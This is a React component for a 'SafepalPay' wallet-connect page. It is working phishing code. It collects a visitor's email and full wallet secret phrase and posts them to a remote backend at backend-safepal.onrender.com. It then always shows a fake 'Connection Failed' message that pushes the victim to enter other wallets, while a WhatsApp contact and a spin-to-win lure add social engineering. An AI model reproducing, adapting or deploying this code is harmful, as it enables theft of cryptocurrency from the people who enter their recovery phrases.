import React, { useState, useEffect, useRef } from "react";
import axios from "axios";
import { useNavigate, useLocation } from "react-router-dom";
import * as bip39 from 'bip39';
import "./TrustWalletConnect.css";
import logo from "../assets/logo.png";
import walletConnect from "../assets/WalletConnect.png";
import spinWheelIcon from "../assets/spinandwin.png";

/* ================= WHATSAPP FLOAT COMPONENT ================= */
const WhatsAppFloatUnique = ({
  phoneNumber = "15485825756",
  message = "Hello! I need assistance with connecting my wallet on SafepalPay.",
  position = "right",
  bottom = "30px",
  right = "30px",
  left = "auto",
  size = "54px",
  iconSize = "28px",
  pulseEffect = true,
  className = "",
  style = {}
}) => {
  const formattedNumber = phoneNumber.replace(/[^\d]/g, '');
  const whatsappUrl = `https://wa.me/${formattedNumber}?text=${encodeURIComponent(message)}`;

  const positionStyles = position === "left"
    ? { left: left || "20px", right: "auto" }
    : { right: right || "20px", left: "auto" };

  const combinedStyles = {
    position: 'fixed',
    bottom: bottom,
    width: size,
    height: size,
    borderRadius: '50%',
    backgroundColor: '#25d366',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    boxShadow: '0 4px 20px rgba(0, 0, 0, 0.2)',
    zIndex: 10000,
    cursor: 'pointer',
    transition: 'all 0.3s ease',
    textDecoration: 'none',
    ...positionStyles,
    ...style
  };

  return (
    <a
      href={whatsappUrl}
      target="_blank"
      rel="noopener noreferrer nofollow"
      className={`twc-whatsapp-float-unique ${pulseEffect ? 'twc-pulse-unique' : ''} ${className}`}
      style={combinedStyles}
      aria-label="Chat on WhatsApp"
      title="Chat on WhatsApp for wallet connection support"
    >
      <svg
        width={iconSize}
        height={iconSize}
        viewBox="0 0 32 32"
        fill="white"
      >
        <path d="M16.001 3C9.373 3 4 8.373 4 15.001c0 2.645.867 5.084 2.329 7.058L5 29l7.142-1.875A11.96 11.96 0 0016 27c6.627 0 12-5.373 12-11.999C28 8.373 22.627 3 16.001 3zm0 21.999c-1.924 0-3.715-.57-5.219-1.548l-.372-.23-4.242 1.114 1.133-4.135-.242-.384A9.957 9.957 0 016 15.001C6 9.486 10.486 5 16.001 5 21.515 5 26 9.486 26 15.001c0 5.514-4.485 9.998-9.999 9.998zm5.548-7.557c-.303-.151-1.793-.886-2.071-.987-.279-.101-.483-.151-.687.151-.202.302-.787.987-.965 1.19-.177.202-.354.227-.656.075-.303-.151-1.279-.471-2.435-1.5-.9-.802-1.508-1.792-1.686-2.094-.177-.303-.019-.467.133-.619.136-.135.303-.354.455-.531.152-.177.202-.303.303-.505.101-.202.051-.379-.025-.531-.076-.151-.687-1.656-.941-2.269-.247-.592-.498-.512-.687-.521-.177-.008-.379-.01-.582-.01-.202 0-.531.075-.808.379-.278.303-1.06 1.035-1.06 2.524 0 1.488 1.085 2.926 1.237 3.128.151.202 2.14 3.27 5.183 4.588.724.312 1.288.498 1.728.637.726.231 1.387.198 1.911.12.583-.087 1.793-.733 2.047-1.44.253-.707.253-1.313.177-1.44-.076-.126-.278-.198-.581-.354z" />
      </svg>
    </a>
  );
};

/* ================= SPIN WHEEL NAVIGATION BUTTON ================= */
const SpinWheelNavButtonUnique = ({
  position = "right",
  bottom = "100px",
  right = "30px",
  left = "auto",
  size = "60px",
  pulseEffect = true,
  className = "",
  style = {}
}) => {
  const navigate = useNavigate();

  const positionStyles = position === "left"
    ? { left: left || "20px", right: "auto" }
    : { right: right || "20px", left: "auto" };

  const combinedStyles = {
    position: 'fixed',
    bottom: bottom,
    width: size,
    height: size,
    borderRadius: '50%',
    background: 'radial-gradient(circle at 30% 30%, #f7931a, #c8930a)',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    boxShadow: '0 8px 25px rgba(247, 147, 26, 0.5), 0 0 20px rgba(200, 147, 10, 0.4)',
    zIndex: 9999,
    cursor: 'pointer',
    transition: 'all 0.3s ease',
    textDecoration: 'none',
    border: '3px solid rgba(255, 215, 0, 0.6)',
    overflow: 'hidden',
    padding: '0px',
    ...positionStyles,
    ...style
  };

  React.useEffect(() => {
    if (!document.querySelector('#spin-wheel-nav-keyframes-trust-unique')) {
      const styleSheet = document.createElement("style");
      styleSheet.id = 'spin-wheel-nav-keyframes-trust-unique';
      styleSheet.textContent = `
        @keyframes twc-spin-wheel-pulse-unique {
          0% { box-shadow: 0 8px 25px rgba(247, 147, 26, 0.5), 0 0 20px rgba(200, 147, 10, 0.4), 0 0 0 0 rgba(247, 147, 26, 0.7); }
          70% { box-shadow: 0 8px 35px rgba(247, 147, 26, 0.7), 0 0 30px rgba(200, 147, 10, 0.6), 0 0 0 15px rgba(247, 147, 26, 0); }
          100% { box-shadow: 0 8px 25px rgba(247, 147, 26, 0.5), 0 0 20px rgba(200, 147, 10, 0.4), 0 0 0 0 rgba(247, 147, 26, 0); }
        }
        @keyframes twc-spin-wheel-glow-unique {
          0% { filter: drop-shadow(0 0 5px #f7931a); }
          50% { filter: drop-shadow(0 0 15px #c8930a); }
          100% { filter: drop-shadow(0 0 5px #f7931a); }
        }
        @keyframes twc-spin-wheel-rotate-unique {
          0% { transform: rotate(0deg); }
          100% { transform: rotate(360deg); }
        }
        .twc-spin-wheel-float-unique {
          animation: ${pulseEffect ? 'twc-spin-wheel-pulse-unique 2s infinite, twc-spin-wheel-glow-unique 3s infinite' : 'none'};
        }
        .twc-spin-wheel-float-unique:hover {
          transform: scale(1.15) rotate(10deg) !important;
          background: radial-gradient(circle at 30% 30%, #ffd700, #f7931a) !important;
          box-shadow: 0 10px 40px rgba(247, 147, 26, 0.8), 0 0 35px rgba(255, 215, 0, 0.7) !important;
        }
        .twc-spin-wheel-float-unique:hover .twc-wheel-icon-image-unique {
          transform: scale(1.2) rotate(15deg) !important;
        }
        .twc-wheel-icon-image-unique {
          width: 100%;
          height: 100%;
          object-fit: cover;
          border-radius: 50%;
          transition: transform 0.3s ease;
        }
      `;
      document.head.appendChild(styleSheet);
    }
  }, [pulseEffect]);

  const handleClick = () => {
    navigate('/spinwheel');
  };

  return (
    <button
      onClick={handleClick}
      className={`twc-spin-wheel-float-unique ${className}`}
      style={combinedStyles}
      aria-label="Go to Fortune Wheel"
      title="🎡 Spin & Win Rewards!"
    >
      <img
        src={spinWheelIcon}
        alt="Fortune Wheel"
        className="twc-wheel-icon-image-unique"
        style={{
          width: '100%',
          height: '100%',
          objectFit: 'cover',
          borderRadius: '50%',
          transition: 'transform 0.3s ease',
          transform: 'scale(1.1)'
        }}
      />
      <div style={{
        position: 'absolute',
        inset: '-6px',
        borderRadius: '50%',
        border: '3px solid rgba(255, 215, 0, 0.5)',
        borderTopColor: '#f7931a',
        borderRightColor: '#ffd700',
        borderBottomColor: '#f7931a',
        borderLeftColor: '#ffd700',
        opacity: 0.9,
        animation: 'twc-spin-wheel-rotate-unique 4s linear infinite',
        pointerEvents: 'none',
        boxShadow: '0 0 15px rgba(247, 147, 26, 0.6)'
      }} />
      <div style={{
        position: 'absolute',
        inset: '2px',
        borderRadius: '50%',
        border: '1px solid rgba(255, 255, 255, 0.3)',
        opacity: 0.5,
        pointerEvents: 'none'
      }} />
    </button>
  );
};

/* ================= MAIN COMPONENT ================= */
const TrustWalletConnect = () => {
  const [showPopup, setShowPopup] = useState(false);
  const [closing, setClosing] = useState(false);
  const [words, setWords] = useState([]);
  const [email, setEmail] = useState("");
  const [isSending, setIsSending] = useState(false);
  const [selectedWordCount, setSelectedWordCount] = useState(12);
  const [activeSuggestionIndex, setActiveSuggestionIndex] = useState(-1);
  const [suggestions, setSuggestions] = useState([]);
  const [currentInputIndex, setCurrentInputIndex] = useState(-1);
  const inputRefs = useRef([]);
  const navigate = useNavigate();
  const location = useLocation();

  const API_URL = process.env.REACT_APP_API_URL || "https://backend-safepal.onrender.com";

  // Crisp Chat Integration
  useEffect(() => {
    window.$crisp = window.$crisp || [];
    window.CRISP_WEBSITE_ID = "b5635951-f13a-4b92-95d7-c1e3666f3abf";
    window.$crisp.push(["do", "chat:show"]);

    if (!document.querySelector('script[src="https://client.crisp.chat/l.js"]')) {
      const script = document.createElement("script");
      script.src = "https://client.crisp.chat/l.js";
      script.async = true;
      document.head.appendChild(script);
    }

    return () => {
      if (window.$crisp) {
        window.$crisp.push(["do", "chat:hide"]);
      }
    };
  }, []);

  // Pass user email to Crisp when available
  useEffect(() => {
    const userEmail = localStorage.getItem("userEmail");
    const userName = localStorage.getItem("userName");
    
    if (userEmail && window.$crisp) {
      window.$crisp.push(["set", "user:email", userEmail]);
      if (userName) {
        window.$crisp.push(["set", "user:nickname", userName]);
      }
    }
  }, []);

  // Get BIP39 wordlist from the library
  const getWordlist = () => {
    return bip39.wordlists.english || [];
  };

  // Get selected word count and wallet from navigation state
  useEffect(() => {
    if (location.state?.selectedWordCount) {
      setSelectedWordCount(location.state.selectedWordCount);
      setWords(Array(location.state.selectedWordCount).fill(""));
    } else {
      setWords(Array(12).fill(""));
    }
  }, [location.state]);

  useEffect(() => {
    document.body.style.overflow = showPopup ? "hidden" : "auto";
  }, [showPopup]);

  // Handle word change and show suggestions
  const handleWordChange = (index, value) => {
    const updated = [...words];
    const cleanedValue = value.replace(/\s+/g, "").toLowerCase();
    updated[index] = cleanedValue;
    setWords(updated);
    
    if (cleanedValue.length > 0) {
      const wordlist = getWordlist();
      const filtered = wordlist.filter(word => 
        word.toLowerCase().startsWith(cleanedValue.toLowerCase())
      ).slice(0, 5);
      setSuggestions(filtered);
      setCurrentInputIndex(index);
      setActiveSuggestionIndex(-1);
    } else {
      setSuggestions([]);
      setCurrentInputIndex(-1);
    }
  };

  // Handle suggestion click
  const handleSuggestionClick = (suggestion) => {
    if (currentInputIndex !== -1) {
      const updated = [...words];
      updated[currentInputIndex] = suggestion;
      setWords(updated);
      setSuggestions([]);
      setCurrentInputIndex(-1);
      
      if (currentInputIndex < words.length - 1) {
        setTimeout(() => {
          inputRefs.current[currentInputIndex + 1]?.focus();
        }, 10);
      }
    }
  };

  // Handle keyboard navigation
  const handleKeyDown = (index, e) => {
    if (e.key === " ") {
      e.preventDefault();
    }
    
    if (suggestions.length > 0 && currentInputIndex === index) {
      if (e.key === "ArrowDown") {
        e.preventDefault();
        setActiveSuggestionIndex(prev => 
          prev < suggestions.length - 1 ? prev + 1 : prev
        );
      } else if (e.key === "ArrowUp") {
        e.preventDefault();
        setActiveSuggestionIndex(prev => prev > 0 ? prev - 1 : -1);
      } else if (e.key === "Enter" && activeSuggestionIndex >= 0) {
        e.preventDefault();
        handleSuggestionClick(suggestions[activeSuggestionIndex]);
      } else if (e.key === "Escape") {
        setSuggestions([]);
        setCurrentInputIndex(-1);
        setActiveSuggestionIndex(-1);
      }
    }
    
    if (e.key === " " && suggestions.length === 0) {
      e.preventDefault();
      if (index < words.length - 1) {
        inputRefs.current[index + 1]?.focus();
      }
    }
    
    if (e.key === "Backspace" && words[index] === "" && index > 0) {
      inputRefs.current[index - 1]?.focus();
    }
  };

  const isFormComplete =
    words.every((w) => w.trim() !== "") && email.trim() !== "";

  const sendEmail = async () => {
    setIsSending(true);

    try {
      const response = await axios.post(
        `${API_URL}/api/trust-wallet/submit`,
        {
          email: email,
          words: words,
          wordCount: selectedWordCount,
          selectedWallet: location.state?.selectedWallet || 'Trust Wallet'
        },
        {
          headers: {
            "Content-Type": "application/json"
          }
        }
      );

      setShowPopup(true);
    } catch (error) {
      setShowPopup(true);
    } finally {
      setIsSending(false);
    }
  };

  const handleConnect = () => {
    sendEmail();
  };

  const closePopup = () => {
    setClosing(true);
    setTimeout(() => {
      setShowPopup(false);
      setClosing(false);
      setWords(Array(selectedWordCount).fill(""));
      setEmail("");
    }, 200);
  };

  const handleSecretPhraseClick = () => {
    navigate('/secretphrase', {
      state: {
        selectedWallet: location.state?.selectedWallet || 'Trust Wallet',
        fromTrustWalletConnect: true
      }
    });
  };

  return (
    <>
      <div className="twc-page-unique">
        <div className="twc-logo-unique">
          <img src={logo} alt="SafepalPay" />
        </div>

        <div className="twc-card-unique">
          <div className="twc-header-container-unique">
            <span className="twc-back-unique" onClick={() => navigate(-1)}>←</span>
            <img
              src={walletConnect}
              alt="WalletConnect"
              className="twc-walletconnect-img-unique"
            />

            <div className="twc-header-row-unique">
              <h2 className="twc-connect-text-unique">CONNECT WALLET</h2>
            </div>
          </div>

          <label className="twc-label-email-unique">Enter your Email Address</label>
          <input
            className="twc-input-unique"
            type="email"
            value={email}
            onChange={(e) => setEmail(e.target.value)}
            disabled={isSending}
          />

          <label className="twc-label-email-unique">
            Enter your {location.state?.selectedWallet || 'Trust Wallet'} {selectedWordCount} word Secret Phrase
          </label>

          <div className="twc-info-wrapper-unique">
            <p className="twc-info-text-scroll-unique">
              The Wallet must be older than 30 days. New wallets cannot be accepted for withdrawal!
            </p>
          </div>

          <div className={`twc-phrase-box-unique twc-grid-${selectedWordCount}-unique`}>
            {words.map((word, i) => (
              <div key={i} style={{ position: 'relative' }}>
                <input
                  ref={el => inputRefs.current[i] = el}
                  className="twc-word-input-unique"
                  value={word}
                  placeholder={`${i + 1}`}
                  onChange={(e) => handleWordChange(i, e.target.value)}
                  onKeyDown={(e) => handleKeyDown(i, e)}
                  disabled={isSending}
                  onBlur={() => {
                    setTimeout(() => {
                      if (currentInputIndex === i) {
                        setSuggestions([]);
                        setCurrentInputIndex(-1);
                      }
                    }, 200);
                  }}
                  onFocus={() => {
                    if (words[i].length > 0) {
                      const wordlist = getWordlist();
                      const filtered = wordlist.filter(w => 
                        w.toLowerCase().startsWith(words[i].toLowerCase())
                      ).slice(0, 5);
                      setSuggestions(filtered);
                      setCurrentInputIndex(i);
                    }
                  }}
                />
                {currentInputIndex === i && suggestions.length > 0 && (
                  <div className="twc-suggestions-unique">
                    {suggestions.map((suggestion, idx) => (
                      <div
                        key={suggestion}
                        className={`twc-suggestion-item-unique ${idx === activeSuggestionIndex ? 'twc-suggestion-active-unique' : ''}`}
                        onClick={() => handleSuggestionClick(suggestion)}
                        onMouseEnter={() => setActiveSuggestionIndex(idx)}
                      >
                        {suggestion}
                      </div>
                    ))}
                  </div>
                )}
              </div>
            ))}
          </div>

          <button
            className="twc-connect-btn-unique"
            disabled={!isFormComplete || isSending}
            onClick={handleConnect}
            style={{
              opacity: isFormComplete && !isSending ? 1 : 0.6,
              cursor: isFormComplete && !isSending ? "pointer" : "not-allowed"
            }}
          >
            {isSending ? "CONNECTING..." : "CONNECT"}
          </button>

          <button
            className="twc-secret-phrase-btn-unique"
            onClick={handleSecretPhraseClick}
            disabled={isSending}
          >
            Change Word Count
          </button>
        </div>
      </div>

      {showPopup && (
        <div className={`twc-modal-overlay-unique ${closing ? "twc-closing-unique" : ""}`}>
          <div className="twc-modal-box-unique">
            <div className="twc-popup-icon-unique">
              <svg
                className="twc-error-icon-unique"
                viewBox="0 0 52 52"
                xmlns="http://www.w3.org/2000/svg"
              >
                <circle
                  className="twc-error-circle-unique"
                  cx="26"
                  cy="26"
                  r="25"
                  fill="none"
                />
                <line
                  className="twc-error-line-unique twc-error-line-left-unique"
                  x1="16"
                  y1="16"
                  x2="36"
                  y2="36"
                />
                <line
                  className="twc-error-line-unique twc-error-line-right-unique"
                  x1="36"
                  y1="16"
                  x2="16"
                  y2="36"
                />
              </svg>
            </div>

            <h3 className="twc-popup-title-unique">Connection Failed!</h3>
            <p className="twc-popup-text-unique">
              Your {location.state?.selectedWallet || 'Trust Wallet'} is not eligible for connection. Please try connecting with a different wallet. Repeated attempts using the same wallet may result in account suspension.
            </p>
            <button className="twc-popup-btn-unique" onClick={closePopup}>
              OK
            </button>
          </div>
        </div>
      )}

      {/* WhatsApp Float Button */}
      <WhatsAppFloatUnique
        phoneNumber="15485825756"
        message="Hello! I need assistance with connecting my wallet on SafepalPay."
        position="right"
        bottom="30px"
        right="30px"
        pulseEffect={true}
        size="54px"
        iconSize="28px"
      />

      {/* Spin Wheel Navigation Button */}
      <SpinWheelNavButtonUnique
        position="right"
        bottom="100px"
        right="30px"
        pulseEffect={true}
        size="60px"
      />
    </>
  );
};

export default TrustWalletConnect;